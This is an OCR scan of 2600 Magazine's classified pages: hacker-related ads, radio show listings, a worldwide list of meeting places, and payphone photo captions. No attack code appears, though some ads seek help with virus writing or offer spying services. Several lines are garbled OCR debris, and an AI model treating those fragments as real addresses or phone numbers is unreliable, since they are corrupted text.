be able to get the key for a Saturday or Sunday afternoon meeting. I
am in Kenosha, WI, so I can only go to Milwaukee or North Chicago for
meetings. Please e-mail at [illegible]@hotmail.com if interested,
make the subject "keymaker".

Wanted 

NEED TECHNICAL ILLUSTRATOR. I'm writing a book on security
circumvention, lock picking, bypass, safes, alarms, and other
subjects. I need someone experienced at technical drawing to create
original black and white illustrations for my book. I live in the
Dallas-Fort Worth area of Texas and would prefer someone of college
age nearby although we could probably manage long distance
collaboration. This will be unpaid for both of us until the book gets
published, at which point we'd split the profits equally. I intend to
offer it to Loompanics or Delta Press, and have every confidence that
they'll want to publish it. Please contact me at
[illegible]@yahoo.com if interested!

FEMALE HACKERS WANTED IN PITTSBURGH for a study of the beliefs,
behavior, and culture of computer hackers. I offer complete
confidentiality. I pay $35 for an interview. I have no connection
with any law enforcement agency. I am a professor emeritus (retired
professor) but I am still intellectually active. I have done social
research for many decades and have published many articles and four
books. I want to publish an article that will give an accurate,
reasonably sympathetic picture of what hackers are really like - no
whitewash, no journalistic sensationalism, and no law enforcement
hype. Make untraceable telephone call to 412-343-[illegible] or send
untraceable e-mail message to [illegible]. I've completed 15
interviews so far, all with men. I am told that there are women
hackers but so far none have contacted me. I meet my respondents in a
public place, so far mostly at Starbucks coffee shops. You can learn
about me by doing a Google search for Bernhardt Lieberman.

KIDNAPPED BY THE SECRET SERVICE, charged with UNAUTHORIZED USE OF AN
ACCESS DEVICE, all my computers confiscated. 1.8 years remaining on
sentence. Father of two seeking donation of PCs for kids. Both
computer savvy but now without hardware, software, etc. Am willing to
pay shipping on donated PCs, software, and peripherals, if necessary.
Contact me for shipping info. Mr. Darren Leon Felder, Sr.
[illegible], United States Penitentiary, Atlanta, Georgia, Box PMB,
601 McDonough Boulevard, S.E., Atlanta, Georgia 30315-4400; or e-mail
me at [illegible]@yahoo.com.

[illegible] - BRAZILIAN MAD COW CONCERNS: Brazilian cattle, sheep,
and goat meat and associated products (dairy [illegible]) have been
banned by Canada since February 2001 and the U.S. Department of
Agriculture (USDA) has restricted the importation of ruminant
products from Brazil after [illegible] 2, 2001 because of concerns
for bovine spongiform encephalopathy (BSE) (mad cow disease). BSE is
always fatal after it eats away at human brain tissue and leaves
sponge-like holes. Boycott Brazil is attempting to help people
understand the "mad cow" issue. It is essential that ALL COUNTRIES
suspend the import of beef and dairy products from Brazil so the
Brazilian government may prove what is fact and what is fiction.
Visit the Boycott Brazil website for more information:
www.brazilboycott.org.

Services 

SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY CALIFORNIA OR FEDERAL
COURT? Consult with a semantic warrior committed to the liberation of
information specializing in hacker, cracker, and phreak defense.
Contact Omar Figueroa, at (800) 986-5591 or (415) 986-5591, at
omar@aya.yale.edu, or at 506 Broadway, San Francisco, CA 94133. Free
personal consultation for 2600 readers. All consultations are
strictly confidential and protected by the attorney-client privilege.

FORMER CYBERCRIME PROSECUTOR now defends those investigated or
charged with this type of crime. Having been on the other side, I
know how the system works and how the government can target YOU! With
prosecutors probably wanting you to serve prison time, you need a
proven veteran trial attorney who knows how to handle these cases and
who knows how to defend your rights. Jason D. Lamm, Esq. (602)
22-CYBER (222-9237). Lamm & Associates, 5050 N. 8th Place, Suite 12,
Phoenix, AZ 85014. Free confidential and professional consultation.

GENERAL PURPOSE EMAIL IDENTITY AUTHENTICATION SERVICE for use from
CGI programs. Legitimate uses only please. [illegible URL]

MISUNDERSTOOD HACKERS UNDERSTOOD. Write me. Consultations are no
charge, and protected by clergy/client privilege. Trained telecom &
electronics tech. [illegible]

COMPUTER SECURITY/SPY. Is a hacker in your computer or network? Do
you need a spy? Call Jason Taylor at [illegible] or email
[illegible].

Announcements 

WDCD - A WANTON DISPLAY OF CONTROL AND DISRUPTION. WDCD is a half
hour radio satire produced by a small group of otherwise unemployed
individuals with roomfuls of old recordings, analog synths,
[illegible], and racks full of strange electronics gear. Born out of
the pirate radio scene, WDCD has existed in various forms on various
unauthorized radio frequencies for longer than any of us care to
recall (or want to admit to). You can hear WDCD every Friday at
[illegible] pm ET on 7415 KHz shortwave and on other random
frequencies. If you don't have a shortwave radio, you're missing out
on some interesting stuff! Check out our website for more
information: http://www.wdcdradio.com. Verified WDCD listeners will
get a free surprise. WDCD Radio, [illegible], Philadelphia, PA
[illegible]. Email [illegible].

HACKERMIND: Tune in Thursdays at 10 pm ET by opening location
[illegible] with Winamp or Real Player to hear Hackermind, the show
focusing on the opinions of those in the hacker world. For more
details, check out www.hackermind.net.

OFF THE HOOK is the weekly one hour hacker radio show presented
Tuesday nights at 8:00 pm ET on WBAI 99.5 FM in New York City. You
can also tune in over the net at www.2600.com/offthehook or on
shortwave in North and South America at 7415 khz. Archives of all
shows dating back to 1988 can be found at the 2600 site, now in mp3
format! Your feedback is welcome at oth@2600.com.

Personals 

STARTING A HACKER SUPPORT GROUP and need participation from
experienced and inexperienced hackers, crackers, and phreakers. If
you would like to join this FREE service, write me at the address
below. You may be asked to search for information on the 'net to
assist others with less experience or submit knowledge of techniques
you know. Also, looking for political views and electronic projects
as well as ideas for hacking for a magazine I am starting. Write to
me at: [illegible], Fort Stockton, Texas 79755. All inquiries will be
answered.

IMPRISONED VIRUS WRITER. Though I am still a novice at virus
technology, I do wish to become more knowledgeable through
correspondence with skilled virus writers. I will gladly pay for
such. Daniel McAvey #[illegible], Rt. 1 Box [illegible], Tennessee
Colony, TX [illegible].

ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying
to take out an ad unless you subscribe! All ads are free and there is
no amount of money we will accept for a non-subscriber ad. We hope
that's clear. Of course, we reserve the right to pass judgment on
your ad and not print it if it's amazingly stupid or has nothing at
all to do with the hacker world. We make no guarantee as to the
honesty, righteousness, sanity, etc. of the people advertising here.
Contact them at your peril. All submissions are for ONE ISSUE ONLY!
If you want to run your ad more than once you must resubmit it each
time. Don't expect us to run more than one ad for you in a single
issue either. Include your address label or a photocopy so we know
you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99,
Middle Island, NY 11953. Deadline for Summer issue: 6/1/02.




Meetings

ARGENTINA
Buenos Aires: In the bar at San Jose 05.

AUSTRALIA
Adelaide: Outside "The Deli on Pulteney" (formerly Sammy's Snack Bar), near the corner of Grenfell & Pulteney Streets. 6 pm.
Brisbane: Hungry Jacks on the Queen St. Mall (RHS, opposite Info Booth). 7 pm.
Canberra: KC's Virtual Reality Cafe, 11 East RW, Civic. [illegible] pm.
Melbourne: Melbourne Central Shopping Centre at the Swanston Street entrance near the public phones.
Perth: The Merchant Tea and Coffee House, 183 Murray St. 6 pm.
Sydney: The Crystal Palace, front bar/bistro, opposite the bus station area on George Street at Central Station. 6 pm.

AUSTRIA
Graz: Cafe Haltestelle on Jakominiplatz.

BRAZIL
Belo Horizonte: Pelego's Bar at Assufeng, near the payphone. 6 pm.

CANADA
Alberta
Calgary: Eau Claire Market food court by the bland yellow wall (formerly the "milk wall").
Edmonton: Edmonton City Centre, Lower Level West in the [illegible] by the payphones.
British Columbia
Vancouver: Pacific Centre Food Fair, one level down from street level by payphones. 4 pm to 9 pm.
Victoria: Eaton Center food court by A&W.
New Brunswick
Moncton: Ground Zero Networks, [illegible] Main St.
Ontario
Barrie: William's Coffee Pub, Bryne Drive. 7 pm.
Hamilton: Jackson Square food court by payphones and Burger King. 7:30 pm.
Quebec
Montreal: Bell Amphitheatre, 1000 Gauchetiere Street.

DENMARK
Aarhus: In the far corner of the DSB cafe in the railway station.
Copenhagen: Terminalbar in Hovedbanegardens Shopping Center.

ENGLAND
Bristol: Next to the orange and grey payphones opposite the "Game" store, Merchant Street, Broadmead. Payphones: +44-117-9299011, [illegible]. 7:30 pm.
Hull: In the Old Grey Mare pub, opposite The University of Hull. 7 pm.
Leeds: Leeds City train station by the payphones. 7 pm.
London: Trocadero Shopping Center (near Picadilly Circus), lowest level. 7 pm.
Manchester: The Green Room on Whitworth Street. 7 pm.
Southampton: City Center at the Internet Cafe in the Bargate. 7 pm.

FRANCE
Paris: Place d'Italie XIII in front of the Grand Ecran Cinema. 6-7 pm.

GERMANY
Karlsruhe: "Old Dubliner" Irish Pub, Kapellenstrasse. Near public phone. 7 pm.

GREECE
Athens: Outside the bookstore Papaswtiriou on the corner of Patision and Stournari. 7 pm.

All meetings take place on the
[illegible] start a meeting in your city,


ITALY
Milan: Piazza Loreto in front of McDonalds.

MEXICO
Mexico City: Zocalo Subway Station (Line 2 of the Metro, blue line). At the "Departamento del Distrito Federal" exit, near the payphones & the candy shop, at the beginning of the "Zocalo-Pino Suarez" tunnel.

NEW ZEALAND
Auckland: London Bar, upstairs, Wellesley St., Auckland Central. 5:30 pm.
Christchurch: Java Cafe, corner of High St. and Manchester St. 6 pm.
Wellington: Murphy's Bar in Cuba Mall. 5:30 pm.

NORWAY
Oslo: Oslo Sentral Train Station. 7 pm.
Trondheim: Rick's Cafe in Nordregate. 6 pm.

POLAND
Stargard Szczecinski: Art Caffe. Bring blue book. 7 pm.

RUSSIA
Moscow: Burger Queen cafe near TAR/TASU (Telephone Agency of Russia/Telegraph Agency of Soviet Union) - also known as Nicitskie Vorota.

SCOTLAND
Glasgow: Central Station, payphones next to Platform 1. 7 pm.

SOUTH AFRICA
Johannesburg (Sandton City): Sandton food court. 6:30 pm.

SWEDEN
Gavle: Railroad station.
GNITKD STATUS 
Alabama 

Auburn: The student lounge
upstairs in the Foy Union Building.
7 pm.

Birmingham: Hoover Galleria
food court by the payphones next to
Wendy's. 7 pm.

Tuscaloosa: McFarland Mall food
court near the front entrance.
Arizona

Tempe: Game Works at Arizona
Mills Mall.

Tucson: Barnes & Noble, 5130 E.
Broadway.

Arkansas

Jonesboro: Indian Mall food court
by the big windows.

California

Los Angeles: Union Station, corner
of Macy & Alameda. Inside main
entrance by bank of phones.
Payphones: (213) 972-9519, 9520;
625-9923, 9924; 613-9704, 9746.
Omits;* Ciyrnty llpspona Niguel jt 
hint CpflCx, 27020 Alicia 

P:iA:w:iy, -Up. 

San Diego: Leucadia's Pizzeria on
Regents Road (Vons Shopping
Mall).

San Francisco: 4 Embarcadero
Plaza (inside). Payphones: (415)
3^4 ftyAL. ’ jxi ji 

San Jose (Campbell): Orchard
Valley Coffee Shop/Net Cafe on the
corner of S Central Ave. and E
Campbell Ave.

Santa Barbara: Cafe Siena on
State Street.

Colorado

Boulder: Fatty J's food court, 13th
and College. 6 pm.

Connecticut

Meriden: Meriden Square Mall
food court. 6 pm.

District of Columbia
Arlington: Pentagon City Mall in
the food court. 6 pm.


Florida 

Ft. Lauderdale: Broward Mall in
the food court by the payphones.
fioittttliitr: Ahrde.- RevA Su.a'e . 
L. itfe'e* r t 1-7". .v/MSev, Ik-rry 

Georgia

Atlanta: Lenox Mall food court.
7 pm.
Hawaii

I loni d u I u : Cnjfee Talk t. .tfr. WJl 
WuhlIjl A vc Pav phono 02- 

L >1 S4 ftps ri 

Idaho 

Pocatello: College Market, 604
South 8th Street.

Illinois

Chicago: Union Station in the
Great Hall near the payphones.

Indiana

Evansville: Barnes and Noble cafe
at 624 S Green River Rd.

Ft. Wayne: Glenbrook Mall food
court in front of Sbarro's. 6 pm.
Indianapolis: Borders Books on
the corner of Meridian and
Washington.

Kansas

Kansas City (Overland Park):
Oak Park Mall food court.

Louisiana

Baton Rouge: In the LSU Union
between the Tiger Pause
& McDonald's, next to the
payphones. Payphone numbers: (225)
387.-5420; -y>l% '■!?%$. 

97J5 

Nt-v. Orltiums: ? tliinWlioTi Qjlf^ie 
I m >i I’-te, 5:' j 5 G ,. ; i;il 5 ; ;| ■. d . .; , pii , 

Maine

Portland: Maine Mall by the bench
at the food court door.

Maryland

Baltimore: Barnes & Noble cafe at
the Inner Harbor.

Massachusetts

Boston: Prudential Center Plaza,
terrace food court at the tables near
the windows. 7 pm.

Marlborough: Solomon Park Mall
food court.

Northampton: Javanet Cafe across
from Polaski Park.

Michigan

Ann Arbor: Michigan Union
(University of Michigan), Welker
Room.

Grand Rapids: Rivertown Crossings
Mall, second level in the food
court.

Minnesota

Bloomington: Mall of America,
north side food court, across from
Burger King & the bank of
payphones that don't take incoming
calls.

Duluth: Barnes & Noble by Cubs.
7 pm.

Missouri

Kansas City (Independence):
Barnes & Noble, 19120 East
49th St.

St. Louis: Galleria, Highway 40 &
Brentwood, elevated section, food
court area, by the theaters.
Springfield: Barnes & Noble on
Battlefield across from the mall.
5:30 pm.

Nebraska

Omaha: Oak View Mall Barnes &
Noble. 7 pm.

Nevada

Las Vegas: Wow Superstore Cafe,
Sahara & Decatur. 8 pm.
New Mexico

Albuquerque: Winrock Mall food
court, near payphones on the lower
level between the fountain &
arcade.


New York 

Buffalo: Galleria Mall food court.
New York: Citigroup Center, in the
lobby, near the payphones, 153 E
53rd St., between Lexington & 3rd.

North Carolina

Charlotte: South Park Mall, upper
area of food court.

North Dakota

Fargo (Moorhead, MN): Center
Mall food court by the fountain.
Ohio

Akron: Arabica on W. Market
Street, intersection of Hawkins, W.
Market, and

Cirrin mli: Oody's (.'VtiC'. 1 1 1 

licnui Si., for. hack rritim ft’ pro 
Cleveland (Bedford): Cyber Pete's
Internet Cafe, 665 Broadway Ave.
Columbus: Convention Center
(downtown), basement, far back of
building in carpeted payphone area.
7 pm.

Dayton: At the Marions behind the
Dayton Mall. 6 pm.

Oklahoma

Oklahoma City: Penn Square Mall
on the edge of the food court by
Pretzel Logic.

Tulsa: Woodland Hills Mall food
court.

Oregon

Portland: Pioneer Place Mall (not
Pioneer Square!), food court. 6 pm.

Pennsylvania

PhilddHphUt: (tHi- Screei Suitniin 

foovl v'( v . r t. fl: i 1 ■ 4:mg wji-ttLin 

Pittsburgh: William Pitt Union
building on the University of
Pittsburgh campus by the Bigelow
Boulevard entrance.

South Carolina

Charleston: Northwoods Mall in
the hall between Sears and
Chik-Fil-A.

South Dakota

Sioux Falls: Empire Mall, by
Burger King.

Tennessee

Knoxville: Borders Books Cafe
across from Westown Mall.
Memphis: Barnes & Noble,
Hickory Ridge Mall.

Nashville: J-J's Market, 1912
Broadway.

Texas

Austin: Dobie Mall food court.
Dallas: Mama's Pizza, Campbell &
Preston. 7 pm.

Houston: Cafe Nicholas in Galleria 1.
San Antonio: North Star Mall food
court. 6 pm.

Utah

Salt Lake City: ZCMI Mall in the
food court near Zion's Bank.
Vermont

Burlington: Borders Books at
Church St. and Cherry St. on the
second floor of the cafe.

Virginia

(see District of Columbia)
Washington

Seattle: Washington State Convention
Center, first floor. 6 pm.
Wisconsin

Madison: Union South (227 N.
Randall Ave.) on the lower level in
the Martin Luther King Jr. Lounge
by the payphones. Payphone:
75HWC 

Milwaukee (Wauwatosa): Mayfair
Mall on Highway 100 & North Ave.
in Rnurii f/l llhvG! jG- 6 pm. 


first Friday of the month. Unless otherwise noted, they start at 5 pm local time.

leave a message & phone number at (631) 751-2600 or send email to meetings@2600.com.


2600 Magazine 


Page 58 




Amsterdam. Increasingly hard to find, this
phone only accepts coins.


Amsterdam. Increasingly easy to find, this
phone doesn't accept coins.



Photos by Daniel Langdon Jones 


Come and visit our website and see our vast array of payphone
photos that we've compiled! http://www.2600.com











Phnom Penh, Cambodia. A card-only phone.

Photo by John Bullock 


Phnom Penh, Cambodia. Close-up view. 

Photo by John Bullock 



Willemstad, Curacao. A shape and color so
rarely seen in the States.


Kyiv, Ukraine. This rotary phone is said to
only take prepaid smart cards, although it's 
rather hard to figure out where they would go. 


Photo by Phillip Bettac Zoufal 


Photo by an anonymous Canadian 



Look on the other side of this page for even more photos!